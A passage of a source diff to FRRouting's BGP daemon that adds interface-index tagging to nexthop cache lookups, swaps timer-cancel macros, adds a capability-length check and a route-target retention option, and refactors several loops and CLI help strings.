+ * Gather the ifindex for if up/down events to be
+ * tagged into this fun
+ */
+ if (afi == AFI_IP6 && IN6_IS_ADDR_LINKLOCAL(&peer->su.sin6.sin6_addr))
+ ifindex = peer->su.sin6.sin6_scope_id;
bnc = bnc_find(&peer->bgp->nexthop_cache_table[family2afi(p.family)],
- &p, 0);
+ &p, 0, ifindex);
if (!bnc) {
if (BGP_DEBUG(nht, NHT))
zlog_debug(
@@ -408,9 +444,9 @@ static void bgp_process_nexthop_update(struct bgp_nexthop_cache *bnc,
char bnc_buf[BNC_FLAG_DUMP_SIZE];
zlog_debug(
- "%s(%u): Rcvd NH update %pFX(%u) - metric %d/%d #nhops %d/%d flags %s",
+ "%s(%u): Rcvd NH update %pFX(%u)%u) - metric %d/%d #nhops %d/%d flags %s",
bnc->bgp->name_pretty, bnc->bgp->vrf_id, &nhr->prefix,
- bnc->srte_color, nhr->metric, bnc->metric,
+ bnc->ifindex, bnc->srte_color, nhr->metric, bnc->metric,
nhr->nexthop_num, bnc->nexthop_num,
bgp_nexthop_dump_bnc_flags(bnc, bnc_buf,
sizeof(bnc_buf)));
@@ -659,15 +695,22 @@ void bgp_nht_interface_events(struct peer *peer)
struct bgp_nexthop_cache_head *table;
struct bgp_nexthop_cache *bnc;
struct prefix p;
+ ifindex_t ifindex = 0;
if (!IN6_IS_ADDR_LINKLOCAL(&peer->su.sin6.sin6_addr))
return;
if (!sockunion2hostprefix(&peer->su, &p))
return;
+ /*
+ * Gather the ifindex for if up/down events to be
+ * tagged into this fun
+ */
+ if (peer->conf_if && IN6_IS_ADDR_LINKLOCAL(&peer->su.sin6.sin6_addr))
+ ifindex = peer->su.sin6.sin6_scope_id;
table = &bgp->nexthop_cache_table[AFI_IP6];
- bnc = bnc_find(table, &p, 0);
+ bnc = bnc_find(table, &p, 0, ifindex);
if (!bnc)
return;
@@ -703,7 +746,7 @@ void bgp_parse_nexthop_update(int command, vrf_id_t vrf_id)
afi = family2afi(match.family);
tree = &bgp->nexthop_cache_table[afi];
- bnc_nhc = bnc_find(tree, &match, nhr.srte_color);
+ bnc_nhc = bnc_find(tree, &match, nhr.srte_color, 0);
if (!bnc_nhc) {
if (BGP_DEBUG(nht, NHT))
zlog_debug(
@@ -714,7 +757,7 @@ void bgp_parse_nexthop_update(int command, vrf_id_t vrf_id)
tree = &bgp->import_check_table[afi];
- bnc_import = bnc_find(tree, &match, nhr.srte_color);
+ bnc_import = bnc_find(tree, &match, nhr.srte_color, 0);
if (!bnc_import) {
if (BGP_DEBUG(nht, NHT))
zlog_debug(
@@ -982,8 +1025,9 @@ void evaluate_paths(struct bgp_nexthop_cache *bnc)
bnc_str(bnc, buf, PREFIX2STR_BUFFER);
zlog_debug(
- "NH update for %s(%u)(%s) - flags %s chgflags %s- evaluate paths",
- buf, bnc->srte_color, bnc->bgp->name_pretty,
+ "NH update for %s(%d)(%u)(%s) - flags %s chgflags %s- evaluate paths",
+ buf, bnc->ifindex, bnc->srte_color,
+ bnc->bgp->name_pretty,
bgp_nexthop_dump_bnc_flags(bnc, bnc_buf,
sizeof(bnc_buf)),
bgp_nexthop_dump_bnc_change_flags(bnc, chg_buf,
@@ -1190,6 +1234,7 @@ void bgp_nht_reg_enhe_cap_intfs(struct peer *peer)
struct nexthop *nhop;
struct interface *ifp;
struct prefix p;
+ ifindex_t ifindex = 0;
if (peer->ifp)
return;
@@ -1203,8 +1248,14 @@ void bgp_nht_reg_enhe_cap_intfs(struct peer *peer)
if (p.family != AF_INET6)
return;
+ /*
+ * Gather the ifindex for if up/down events to be
+ * tagged into this fun
+ */
+ if (peer->conf_if && IN6_IS_ADDR_LINKLOCAL(&peer->su.sin6.sin6_addr))
+ ifindex = peer->su.sin6.sin6_scope_id;
- bnc = bnc_find(&bgp->nexthop_cache_table[AFI_IP6], &p, 0);
+ bnc = bnc_find(&bgp->nexthop_cache_table[AFI_IP6], &p, 0, ifindex);
if (!bnc)
return;
@@ -1231,6 +1282,7 @@ void bgp_nht_dereg_enhe_cap_intfs(struct peer *peer)
struct nexthop *nhop;
struct interface *ifp;
struct prefix p;
+ ifindex_t ifindex = 0;
if (peer->ifp)
return;
@@ -1245,8 +1297,14 @@ void bgp_nht_dereg_enhe_cap_intfs(struct peer *peer)
if (p.family != AF_INET6)
return;
+ /*
+ * Gather the ifindex for if up/down events to be
+ * tagged into this fun
+ */
+ if (peer->conf_if && IN6_IS_ADDR_LINKLOCAL(&peer->su.sin6.sin6_addr))
+ ifindex = peer->su.sin6.sin6_scope_id;
- bnc = bnc_find(&bgp->nexthop_cache_table[AFI_IP6], &p, 0);
+ bnc = bnc_find(&bgp->nexthop_cache_table[AFI_IP6], &p, 0, ifindex);
if (!bnc)
return;
diff --git a/bgpd/bgp_packet.c b/bgpd/bgp_packet.c
index 7613ccc7df..45752a8ab6 100644
--- a/bgpd/bgp_packet.c
+++ b/bgpd/bgp_packet.c
@@ -125,7 +125,7 @@ static void bgp_packet_add(struct peer *peer, struct stream *s)
intmax_t delta;
uint32_t holdtime;
- frr_with_mutex(&peer->io_mtx) {
+ frr_with_mutex (&peer->io_mtx) {
/* if the queue is empty, reset the "last OK" timestamp to
* now, otherwise if we write another packet immediately
* after it'll get confused
@@ -2002,8 +2002,7 @@ static int bgp_update_receive(struct peer *peer, bgp_size_t size)
gr_info->eor_required,
"EOR RCV",
gr_info->eor_received);
- BGP_TIMER_OFF(
- gr_info->t_select_deferral);
+ THREAD_OFF(gr_info->t_select_deferral);
gr_info->eor_required = 0;
gr_info->eor_received = 0;
/* Best path selection */
@@ -2510,7 +2509,7 @@ static int bgp_route_refresh_receive(struct peer *peer, bgp_size_t size)
return BGP_PACKET_NOOP;
}
- BGP_TIMER_OFF(peer->t_refresh_stalepath);
+ THREAD_OFF(peer->t_refresh_stalepath);
SET_FLAG(peer->af_sflags[afi][safi], PEER_STATUS_EORR_RECEIVED);
UNSET_FLAG(peer->af_sflags[afi][safi],
@@ -2621,6 +2620,14 @@ static int bgp_capability_msg_parse(struct peer *peer, uint8_t *pnt,
"%s CAPABILITY has action: %d, code: %u, length %u",
peer->host, action, hdr->code, hdr->length);
+ if (hdr->length < sizeof(struct capability_mp_data)) {
+ zlog_info(
+ "%pBP Capability structure is not properly filled out, expected at least %zu bytes but header length specified is %d",
+ peer, sizeof(struct capability_mp_data),
+ hdr->length);
+ return BGP_Stop;
+ }
+
/* Capability length check. */
if ((pnt + hdr->length + 3) > end) {
zlog_info("%s Capability length error", peer->host);
@@ -2777,7 +2784,7 @@ void bgp_process_packet(struct thread *thread)
bgp_size_t size;
char notify_data_length[2];
- frr_with_mutex(&peer->io_mtx) {
+ frr_with_mutex (&peer->io_mtx) {
peer->curr = stream_fifo_pop(peer->ibuf);
}
@@ -2904,7 +2911,7 @@ void bgp_process_packet(struct thread *thread)
if (fsm_update_result != FSM_PEER_TRANSFERRED
&& fsm_update_result != FSM_PEER_STOPPED) {
- frr_with_mutex(&peer->io_mtx) {
+ frr_with_mutex (&peer->io_mtx) {
// more work to do, come back later
if (peer->ibuf->count > 0)
thread_add_event(
diff --git a/bgpd/bgp_route.c b/bgpd/bgp_route.c
index b35cbeb21f..2fd747a113 100644
--- a/bgpd/bgp_route.c
+++ b/bgpd/bgp_route.c
@@ -1773,12 +1773,10 @@ static void bgp_peer_remove_private_as(struct bgp *bgp, afi_t afi, safi_t safi,
static void bgp_peer_as_override(struct bgp *bgp, afi_t afi, safi_t safi,
struct peer *peer, struct attr *attr)
{
- if (peer->sort == BGP_PEER_EBGP
- && peer_af_flag_check(peer, afi, safi, PEER_FLAG_AS_OVERRIDE)) {
- if (aspath_single_asn_check(attr->aspath, peer->as))
- attr->aspath = aspath_replace_specific_asn(
- attr->aspath, peer->as, bgp->as);
- }
+ if (peer->sort == BGP_PEER_EBGP &&
+ peer_af_flag_check(peer, afi, safi, PEER_FLAG_AS_OVERRIDE))
+ attr->aspath = aspath_replace_specific_asn(attr->aspath,
+ peer->as, bgp->as);
}
void bgp_attr_add_llgr_community(struct attr *attr)
@@ -3204,7 +3202,7 @@ int bgp_best_path_select_defer(struct bgp *bgp, afi_t afi, safi_t safi)
thread_info = THREAD_ARG(t);
XFREE(MTYPE_TMP, thread_info);
- BGP_TIMER_OFF(bgp->gr_info[afi][safi].t_route_select);
+ THREAD_OFF(bgp->gr_info[afi][safi].t_route_select);
}
if (BGP_DEBUG(update, UPDATE_OUT)) {
@@ -3785,6 +3783,7 @@ int bgp_update(struct peer *peer, const struct prefix *p, uint32_t addpath_id,
uint8_t pi_sub_type = 0;
bool force_evpn_import = false;
safi_t orig_safi = safi;
+ bool leak_success = true;
if (frrtrace_enabled(frr_bgp, process_update)) {
char pfxprint[PREFIX2STR_BUFFER];
@@ -4410,7 +4409,7 @@ int bgp_update(struct peer *peer, const struct prefix *p, uint32_t addpath_id,
if ((SAFI_MPLS_VPN == safi)
&& (bgp->inst_type == BGP_INSTANCE_TYPE_DEFAULT)) {
- vpn_leak_to_vrf_update(bgp, pi);
+ leak_success = vpn_leak_to_vrf_update(bgp, pi);
}
#ifdef ENABLE_BGP_VNC
@@ -4425,7 +4424,13 @@ int bgp_update(struct peer *peer, const struct prefix *p, uint32_t addpath_id,
type, sub_type, NULL);
}
#endif
-
+ if ((safi == SAFI_MPLS_VPN) &&
+ !CHECK_FLAG(bgp->af_flags[afi][safi],
+ BGP_VPNVX_RETAIN_ROUTE_TARGET_ALL) &&
+ !leak_success) {
+ bgp_unlink_nexthop(pi);
+ bgp_path_info_delete(dest, pi);
+ }
return 0;
} // End of implicit withdraw
@@ -4559,8 +4564,7 @@ int bgp_update(struct peer *peer, const struct prefix *p, uint32_t addpath_id,
}
if ((SAFI_MPLS_VPN == safi)
&& (bgp->inst_type == BGP_INSTANCE_TYPE_DEFAULT)) {
-
- vpn_leak_to_vrf_update(bgp, new);
+ leak_success = vpn_leak_to_vrf_update(bgp, new);
}
#ifdef ENABLE_BGP_VNC
if (SAFI_MPLS_VPN == safi) {
@@ -4574,6 +4578,13 @@ int bgp_update(struct peer *peer, const struct prefix *p, uint32_t addpath_id,
sub_type, NULL);
}
#endif
+ if ((safi == SAFI_MPLS_VPN) &&
+ !CHECK_FLAG(bgp->af_flags[afi][safi],
+ BGP_VPNVX_RETAIN_ROUTE_TARGET_ALL) &&
+ !leak_success) {
+ bgp_unlink_nexthop(new);
+ bgp_path_info_delete(dest, new);
+ }
return 0;
@@ -4744,7 +4755,7 @@ void bgp_stop_announce_route_timer(struct peer_af *paf)
if (!paf->t_announce_route)
return;
- thread_cancel(&paf->t_announce_route);
+ THREAD_OFF(paf->t_announce_route);
}
/*
@@ -5042,7 +5053,7 @@ void bgp_soft_reconfig_table_task_cancel(const struct bgp *bgp,
list_delete(&ntable->soft_reconfig_peers);
bgp_soft_reconfig_table_flag(ntable, false);
- BGP_TIMER_OFF(ntable->soft_reconfig_thread);
+ THREAD_OFF(ntable->soft_reconfig_thread);
}
}
@@ -14189,9 +14200,9 @@ DEFUN (show_ip_bgp_neighbor_received_prefix_filter,
IP_STR
BGP_STR
BGP_INSTANCE_HELP_STR
- "Address Family\n"
- "Address Family\n"
- "Address Family modifier\n"
+ BGP_AF_STR
+ BGP_AF_STR
+ BGP_AF_MODIFIER_STR
"Detailed information on TCP and BGP neighbor connections\n"
"Neighbor to display information about\n"
"Neighbor to display information about\n"
@@ -14377,7 +14388,7 @@ DEFUN (show_bgp_afi_vpn_rd_route,
SHOW_STR
BGP_STR
BGP_AFI_HELP_STR
- "Address Family modifier\n"
+ BGP_AF_MODIFIER_STR
"Display information for a route distinguisher\n"
"Route Distinguisher\n"
"All Route Distinguishers\n"
diff --git a/bgpd/bgp_updgrp.c b/bgpd/bgp_updgrp.c
index ea8d2330c5..405dd8f6ec 100644
--- a/bgpd/bgp_updgrp.c
+++ b/bgpd/bgp_updgrp.c
@@ -91,7 +91,8 @@ static void sync_init(struct update_subgroup *subgrp,
bgp_adv_fifo_init(&subgrp->sync->withdraw);
bgp_adv_fifo_init(&subgrp->sync->withdraw_low);
subgrp->hash =
- hash_create(baa_hash_key, baa_hash_cmp, "BGP SubGroup Hash");
+ hash_create(bgp_advertise_attr_hash_key,
+ bgp_advertise_attr_hash_cmp, "BGP SubGroup Hash");
/* We use a larger buffer for subgrp->work in the event that:
* - We RX a BGP_UPDATE where the attributes alone are just
@@ -115,8 +116,11 @@ static void sync_init(struct update_subgroup *subgrp,
static void sync_delete(struct update_subgroup *subgrp)
{
XFREE(MTYPE_BGP_SYNCHRONISE, subgrp->sync);
- if (subgrp->hash)
+ if (subgrp->hash) {
+ hash_clean(subgrp->hash,
+ (void (*)(void *))bgp_advertise_attr_free);
hash_free(subgrp->hash);
+ }
subgrp->hash = NULL;
if (subgrp->work)
stream_free(subgrp->work);
@@ -1896,7 +1900,7 @@ void update_group_refresh_default_originate_route_map(struct thread *thread)
bgp = THREAD_ARG(thread);
update_group_walk(bgp, update_group_default_originate_route_map_walkcb,
reason);
- thread_cancel(&bgp->t_rmap_def_originate_eval);
+ THREAD_OFF(bgp->t_rmap_def_originate_eval);
bgp_unlock(bgp);
}
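The sync_delete() hunk above pairs hash_clean() with hash_free() so the interned advertise attributes are released before the table is destroyed. A minimal sketch of that cleanup pattern, assuming the FRR hash helpers and the bgp_advertise_attr_free() callback named in the diff (the wrapper is hypothetical):

/* hash_clean() walks the table and calls the free callback on every stored
 * element; hash_free() then releases the table itself.  Clearing the caller's
 * pointer afterwards avoids a dangling reference.
 */
static void subgrp_hash_destroy(struct hash **hashp)
{
	if (*hashp == NULL)
		return;

	hash_clean(*hashp, (void (*)(void *))bgp_advertise_attr_free);
	hash_free(*hashp);
	*hashp = NULL;
}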
diff --git a/bgpd/bgp_updgrp_adv.c b/bgpd/bgp_updgrp_adv.c
index 0f7f2f4c02..27e3677702 100644
--- a/bgpd/bgp_updgrp_adv.c
+++ b/bgpd/bgp_updgrp_adv.c
@@ -115,23 +115,22 @@ static void subgrp_withdraw_stale_addpath(struct updwalk_context *ctx,
/* Look through all of the paths we have advertised for this rn and send
* a withdraw for the ones that are no longer present */
RB_FOREACH_SAFE (adj, bgp_adj_out_rb, &ctx->dest->adj_out, adj_next) {
+ if (adj->subgroup != subgrp)
+ continue;
- if (adj->subgroup == subgrp) {
- for (pi = bgp_dest_get_bgp_path_info(ctx->dest); pi;
- pi = pi->next) {
- id = bgp_addpath_id_for_peer(peer, afi, safi,
- &pi->tx_addpath);
+ for (pi = bgp_dest_get_bgp_path_info(ctx->dest); pi;
+ pi = pi->next) {
+ id = bgp_addpath_id_for_peer(peer, afi, safi,
+ &pi->tx_addpath);
- if (id == adj->addpath_tx_id) {
- break;
- }
+ if (id == adj->addpath_tx_id) {
+ break;
}
+ }
- if (!pi) {
- subgroup_process_announce_selected(
- subgrp, NULL, ctx->dest,
- adj->addpath_tx_id);
- }
+ if (!pi) {
+ subgroup_process_announce_selected(
+ subgrp, NULL, ctx->dest, adj->addpath_tx_id);
}
}
}
@@ -165,6 +164,7 @@ static int group_announce_route_walkcb(struct update_group *updgrp, void *arg)
* coalesce timer fires.
*/
if (!subgrp->t_coalesce) {
+
/* An update-group that uses addpath */
if (addpath_capable) {
subgrp_withdraw_stale_addpath(ctx, subgrp);
@@ -193,7 +193,6 @@ static int group_announce_route_walkcb(struct update_group *updgrp, void *arg)
peer, afi, safi,
&ctx->pi->tx_addpath));
}
-
/* An update-group that does not use addpath */
else {
if (ctx->pi) {
@@ -249,39 +248,37 @@ static void subgrp_show_adjq_vty(struct update_subgroup *subgrp,
for (dest = bgp_table_top(table); dest; dest = bgp_route_next(dest)) {
const struct prefix *dest_p = bgp_dest_get_prefix(dest);
- RB_FOREACH (adj, bgp_adj_out_rb, &dest->adj_out)
- if (adj->subgroup == subgrp) {
- if (header1) {
- vty_out(vty,
- "BGP table version is %" PRIu64
- ", local router ID is %pI4\n",
- table->version,
- &bgp->router_id);
- vty_out(vty, BGP_SHOW_SCODE_HEADER);
- vty_out(vty, BGP_SHOW_OCODE_HEADER);
- header1 = 0;
- }
- if (header2) {
- vty_out(vty, BGP_SHOW_HEADER);
- header2 = 0;
- }
- if ((flags & UPDWALK_FLAGS_ADVQUEUE) && adj->adv
- && adj->adv->baa) {
- route_vty_out_tmp(vty, dest, dest_p,
- adj->adv->baa->attr,
- SUBGRP_SAFI(subgrp),
- 0, NULL, false);
- output_count++;
- }
- if ((flags & UPDWALK_FLAGS_ADVERTISED)
- && adj->attr) {
- route_vty_out_tmp(vty, dest, dest_p,
- adj->attr,
- SUBGRP_SAFI(subgrp),
- 0, NULL, false);
- output_count++;
- }
+ RB_FOREACH (adj, bgp_adj_out_rb, &dest->adj_out) {
+ if (adj->subgroup != subgrp)
+ continue;
+
+ if (header1) {
+ vty_out(vty,
+ "BGP table version is %" PRIu64
+ ", local router ID is %pI4\n",
+ table->version, &bgp->router_id);
+ vty_out(vty, BGP_SHOW_SCODE_HEADER);
+ vty_out(vty, BGP_SHOW_OCODE_HEADER);
+ header1 = 0;
+ }
+ if (header2) {
+ vty_out(vty, BGP_SHOW_HEADER);
+ header2 = 0;
+ }
+ if ((flags & UPDWALK_FLAGS_ADVQUEUE) && adj->adv &&
+ adj->adv->baa) {
+ route_vty_out_tmp(
+ vty, dest, dest_p, adj->adv->baa->attr,
+ SUBGRP_SAFI(subgrp), 0, NULL, false);
+ output_count++;
}
+ if ((flags & UPDWALK_FLAGS_ADVERTISED) && adj->attr) {
+ route_vty_out_tmp(vty, dest, dest_p, adj->attr,
+ SUBGRP_SAFI(subgrp), 0, NULL,
+ false);
+ output_count++;
+ }
+ }
}
if (output_count != 0)
vty_out(vty, "\nTotal number of prefixes %ld\n", output_count);
@@ -347,7 +344,7 @@ static void subgroup_coalesce_timer(struct thread *thread)
SUBGRP_FOREACH_PEER (subgrp, paf) {
peer = PAF_PEER(paf);
- BGP_TIMER_OFF(peer->t_routeadv);
+ THREAD_OFF(peer->t_routeadv);
BGP_TIMER_ON(peer->t_routeadv, bgp_routeadv_timer, 0);
}
}
@@ -437,7 +434,7 @@ bgp_advertise_clean_subgroup(struct update_subgroup *subgrp,
next = baa->adv;
/* Unintern BGP advertise attribute. */
- bgp_advertise_unintern(subgrp->hash, baa);
+ bgp_advertise_attr_unintern(subgrp->hash, baa);
} else
fhead = &subgrp->sync->withdraw;
@@ -523,7 +520,7 @@ void bgp_adj_out_set_subgroup(struct bgp_dest *dest,
/* bgp_path_info adj_out reference */
adv->pathi = bgp_path_info_lock(path);
- adv->baa = bgp_advertise_intern(subgrp->hash, attr);
+ adv->baa = bgp_advertise_attr_intern(subgrp->hash, attr);
adv->adj = adj;
adj->attr_hash = attr_hash;
@@ -683,49 +680,47 @@ void subgroup_announce_table(struct update_subgroup *subgrp,
/* Check if the route can be advertised */
advertise = bgp_check_advertise(bgp, dest);
- for (ri = bgp_dest_get_bgp_path_info(dest); ri; ri = ri->next)
-
- if (bgp_check_selected(ri, peer, addpath_capable, afi,
- safi)) {
- if (subgroup_announce_check(dest, ri, subgrp,
- dest_p, &attr,
- NULL)) {
- /* Check if route can be advertised */
- if (advertise) {
- if (!bgp_check_withdrawal(bgp,
- dest))
- bgp_adj_out_set_subgroup(
- dest, subgrp,
- &attr, ri);
- else
- bgp_adj_out_unset_subgroup(
- dest, subgrp, 1,
- bgp_addpath_id_for_peer(
- peer,
- afi,
- safi,
- &ri->tx_addpath));
- }
- } else {
- /* If default originate is enabled for
- * the peer, do not send explicit
- * withdraw. This will prevent deletion
- * of default route advertised through
- * default originate
- */
- if (CHECK_FLAG(
- peer->af_flags[afi][safi],
- PEER_FLAG_DEFAULT_ORIGINATE)
- && is_default_prefix(bgp_dest_get_prefix(dest)))
- break;
-
- bgp_adj_out_unset_subgroup(
- dest, subgrp, 1,
- bgp_addpath_id_for_peer(
- peer, afi, safi,
- &ri->tx_addpath));
+ for (ri = bgp_dest_get_bgp_path_info(dest); ri; ri = ri->next) {
+
+ if (!bgp_check_selected(ri, peer, addpath_capable, afi,
+ safi))
+ continue;
+
+ if (subgroup_announce_check(dest, ri, subgrp, dest_p,
+ &attr, NULL)) {
+ /* Check if route can be advertised */
+ if (advertise) {
+ if (!bgp_check_withdrawal(bgp, dest))
+ bgp_adj_out_set_subgroup(
+ dest, subgrp, &attr,
+ ri);
+ else
+ bgp_adj_out_unset_subgroup(
+ dest, subgrp, 1,
+ bgp_addpath_id_for_peer(
+ peer, afi, safi,
+ &ri->tx_addpath));
}
+ } else {
+ /* If default originate is enabled for
+ * the peer, do not send explicit
+ * withdraw. This will prevent deletion
+ * of default route advertised through
+ * default originate
+ */
+ if (CHECK_FLAG(peer->af_flags[afi][safi],
+ PEER_FLAG_DEFAULT_ORIGINATE) &&
+ is_default_prefix(
+ bgp_dest_get_prefix(dest)))
+ break;
+
+ bgp_adj_out_unset_subgroup(
+ dest, subgrp, 1,
+ bgp_addpath_id_for_peer(
+ peer, afi, safi,
+ &ri->tx_addpath));
}
+ }
}
UNSET_FLAG(subgrp->sflags, SUBGRP_STATUS_TABLE_REPARSING);
diff --git a/bgpd/bgp_vty.c b/bgpd/bgp_vty.c
index 19901792ea..0eba5ea447 100644
--- a/bgpd/bgp_vty.c
+++ b/bgpd/bgp_vty.c
@@ -951,14 +951,24 @@ static void bgp_clear_vty_error(struct vty *vty, struct peer *peer, afi_t afi,
{
switch (error) {
case BGP_ERR_AF_UNCONFIGURED:
- vty_out(vty,
- "%% BGP: Enable %s address family for the neighbor %s\n",
- get_afi_safi_str(afi, safi, false), peer->host);
+ if (vty)
+ vty_out(vty,
+ "%% BGP: Enable %s address family for the neighbor %s\n",
+ get_afi_safi_str(afi, safi, false), peer->host);
+ else
+ zlog_warn(
+ "%% BGP: Enable %s address family for the neighbor %s",
+ get_afi_safi_str(afi, safi, false), peer->host);
break;
case BGP_ERR_SOFT_RECONFIG_UNCONFIGURED:
- vty_out(vty,
- "%% BGP: Inbound soft reconfig for %s not possible as it\n has neither refresh capability, nor inbound soft reconfig\n",
- peer->host);
+ if (vty)
+ vty_out(vty,
+ "%% BGP: Inbound soft reconfig for %s not possible as it\n has neither refresh capability, nor inbound soft reconfig\n",
+ peer->host);
+ else
+ zlog_warn(
+ "%% BGP: Inbound soft reconfig for %s not possible as it has neither refresh capability, nor inbound soft reconfig",
+ peer->host);
break;
default:
break;
@@ -1274,6 +1284,11 @@ static void bgp_clear_star_soft_out(struct vty *vty, const char *name)
}
+void bgp_clear_soft_in(struct bgp *bgp, afi_t afi, safi_t safi)
+{
+ bgp_clear(NULL, bgp, afi, safi, clear_all, BGP_CLEAR_SOFT_IN, NULL);
+}
+
#ifndef VTYSH_EXTRACT_PL
#include "bgpd/bgp_vty_clippy.c"
#endif
@@ -2055,7 +2070,7 @@ DEFUN (no_bgp_maxmed_onstartup,
/* Cancel max-med onstartup if its on */
if (bgp->t_maxmed_onstartup) {
- thread_cancel(&bgp->t_maxmed_onstartup);
+ THREAD_OFF(bgp->t_maxmed_onstartup);
bgp->maxmed_onstartup_over = 1;
}
@@ -3840,11 +3855,17 @@ DEFPY(bgp_default_afi_safi, bgp_default_afi_safi_cmd,
afi_t afi = bgp_vty_afi_from_str(afi_str);
safi_t safi;
+ /*
+ * Impossible situation but making coverity happy
+ */
+ assert(afi != AFI_MAX);
+
if (strmatch(safi_str, "labeled"))
safi = bgp_vty_safi_from_str("labeled-unicast");
else
safi = bgp_vty_safi_from_str(safi_str);
+ assert(safi != SAFI_MAX);
if (no)
bgp->default_af[afi][safi] = false;
else {
@@ -6838,7 +6859,7 @@ static int peer_port_vty(struct vty *vty, const char *ip_str, int afi,
uint16_t port;
struct servent *sp;
- peer = peer_lookup_vty(vty, ip_str);
+ peer = peer_and_group_lookup_vty(vty, ip_str);
if (!peer)
return CMD_WARNING_CONFIG_FAILED;
@@ -6857,9 +6878,9 @@ static int peer_port_vty(struct vty *vty, const char *ip_str, int afi,
/* Set specified peer's BGP port. */
DEFUN (neighbor_port,
neighbor_port_cmd,
- "neighbor <A.B.C.D|X:X::X:X> port (0-65535)",
+ "neighbor <A.B.C.D|X:X::X:X|WORD> port (0-65535)",
NEIGHBOR_STR
- NEIGHBOR_ADDR_STR
+ NEIGHBOR_ADDR_STR2
"Neighbor's BGP port\n"
"TCP port number\n")
{
@@ -6871,10 +6892,10 @@ DEFUN (neighbor_port,
DEFUN (no_neighbor_port,
no_neighbor_port_cmd,
- "no neighbor <A.B.C.D|X:X::X:X> port [(0-65535)]",
+ "no neighbor <A.B.C.D|X:X::X:X|WORD> port [(0-65535)]",
NO_STR
NEIGHBOR_STR
- NEIGHBOR_ADDR_STR
+ NEIGHBOR_ADDR_STR2
"Neighbor's BGP port\n"
"TCP port number\n")
{
@@ -7256,7 +7277,7 @@ DEFUN (bgp_set_route_map_delay_timer,
* fired.
*/
if (!rmap_delay_timer && bm->t_rmap_update) {
- BGP_TIMER_OFF(bm->t_rmap_update);
+ THREAD_OFF(bm->t_rmap_update);
thread_execute(bm->master, bgp_route_map_update_timer,
NULL, 0);
}
@@ -9367,7 +9388,7 @@ DEFUN_NOSH (address_family_ipv4_safi,
address_family_ipv4_safi_cmd,
"address-family ipv4 [<unicast|multicast|vpn|labeled-unicast|flowspec>]",
"Enter Address Family command mode\n"
- "Address Family\n"
+ BGP_AF_STR
BGP_SAFI_WITH_LABEL_HELP_STR)
{
@@ -9392,7 +9413,7 @@ DEFUN_NOSH (address_family_ipv6_safi,
address_family_ipv6_safi_cmd,
"address-family ipv6 [<unicast|multicast|vpn|labeled-unicast|flowspec>]",
"Enter Address Family command mode\n"
- "Address Family\n"
+ BGP_AF_STR
BGP_SAFI_WITH_LABEL_HELP_STR)
{
if (argc == 3) {
@@ -9417,8 +9438,8 @@ DEFUN_NOSH (address_family_vpnv4,
address_family_vpnv4_cmd,
"address-family vpnv4 [unicast]",
"Enter Address Family command mode\n"
- "Address Family\n"
- "Address Family modifier\n")
+ BGP_AF_STR
+ BGP_AF_MODIFIER_STR)
{
vty->node = BGP_VPNV4_NODE;
return CMD_SUCCESS;
@@ -9428,8 +9449,8 @@ DEFUN_NOSH (address_family_vpnv6,
address_family_vpnv6_cmd,
"address-family vpnv6 [unicast]",
"Enter Address Family command mode\n"
- "Address Family\n"
- "Address Family modifier\n")
+ BGP_AF_STR
+ BGP_AF_MODIFIER_STR)
{
vty->node = BGP_VPNV6_NODE;
return CMD_SUCCESS;
@@ -9440,8 +9461,8 @@ DEFUN_NOSH (address_family_evpn,
address_family_evpn_cmd,
"address-family l2vpn evpn",
"Enter Address Family command mode\n"
- "Address Family\n"
- "Address Family modifier\n")
+ BGP_AF_STR
+ BGP_AF_MODIFIER_STR)
{
VTY_DECLVAR_CONTEXT(bgp, bgp);
vty->node = BGP_EVPN_NODE;
@@ -9692,9 +9713,9 @@ DEFUN (clear_ip_bgp_all,
BGP_STR
BGP_INSTANCE_HELP_STR
BGP_AFI_HELP_STR
- "Address Family\n"
+ BGP_AF_STR
BGP_SAFI_WITH_LABEL_HELP_STR
- "Address Family modifier\n"
+ BGP_AF_MODIFIER_STR
"Clear all peers\n"
"BGP IPv4 neighbor to clear\n"
"BGP IPv6 neighbor to clear\n"
@@ -9827,7 +9848,7 @@ DEFUN (clear_bgp_ipv6_safi_prefix,
CLEAR_STR
IP_STR
BGP_STR
- "Address Family\n"
+ BGP_AF_STR
BGP_SAFI_HELP_STR
"Clear bestpath and re-advertise\n"
"IPv6 prefix\n")
@@ -9851,7 +9872,7 @@ DEFUN (clear_bgp_instance_ipv6_safi_prefix,
IP_STR
BGP_STR
BGP_INSTANCE_HELP_STR
- "Address Family\n"
+ BGP_AF_STR
BGP_SAFI_HELP_STR
"Clear bestpath and re-advertise\n"
"IPv6 prefix\n")
@@ -10173,9 +10194,11 @@ DEFUN (show_bgp_memory,
count, mtype_memstr(memstrbuf, sizeof(memstrbuf),
count * sizeof(struct community)));
if ((count = mtype_stats_alloc(MTYPE_ECOMMUNITY)))
- vty_out(vty, "%ld BGP community entries, using %s of memory\n",
- count, mtype_memstr(memstrbuf, sizeof(memstrbuf),
- count * sizeof(struct ecommunity)));
+ vty_out(vty,
+ "%ld BGP ext-community entries, using %s of memory\n",
+ count,
+ mtype_memstr(memstrbuf, sizeof(memstrbuf),
+ count * sizeof(struct ecommunity)));
if ((count = mtype_stats_alloc(MTYPE_LCOMMUNITY)))
vty_out(vty,
"%ld BGP large-community entries, using %s of memory\n",
@@ -10392,9 +10415,24 @@ static void bgp_show_failed_summary(struct vty *vty, struct bgp *bgp,
static char *bgp_peer_description_stripped(char *desc, uint32_t size)
{
static char stripped[BUFSIZ];
- uint32_t len = size > strlen(desc) ? strlen(desc) : size;
+ uint32_t i = 0;
+ uint32_t last_space = 0;
+
+ while (i < size) {
+ if (*(desc + i) == 0) {
+ stripped[i] = '\0';
+ return stripped;
+ }
+ if (i != 0 && *(desc + i) == ' ' && last_space != i - 1)
+ last_space = i;
+ stripped[i] = *(desc + i);
+ i++;
+ }
- strlcpy(stripped, desc, len + 1);
+ if (last_space > size)
+ stripped[size + 1] = '\0';
+ else
+ stripped[last_space] = '\0';
return stripped;
}
@@ -14672,8 +14710,8 @@ DEFUN (show_ip_bgp_neighbors,
IP_STR
BGP_STR
BGP_INSTANCE_HELP_STR
- "Address Family\n"
- "Address Family\n"
+ BGP_AF_STR
+ BGP_AF_STR
"Detailed information on TCP and BGP neighbor connections\n"
"Neighbor to display information about\n"
"Neighbor to display information about\n"
@@ -16315,6 +16353,34 @@ DEFUN(no_neighbor_tcp_mss, no_neighbor_tcp_mss_cmd,
return peer_tcp_mss_vty(vty, argv[peer_index]->arg, NULL);
}
+DEFPY(bgp_retain_route_target, bgp_retain_route_target_cmd,
+ "[no$no] bgp retain route-target all",
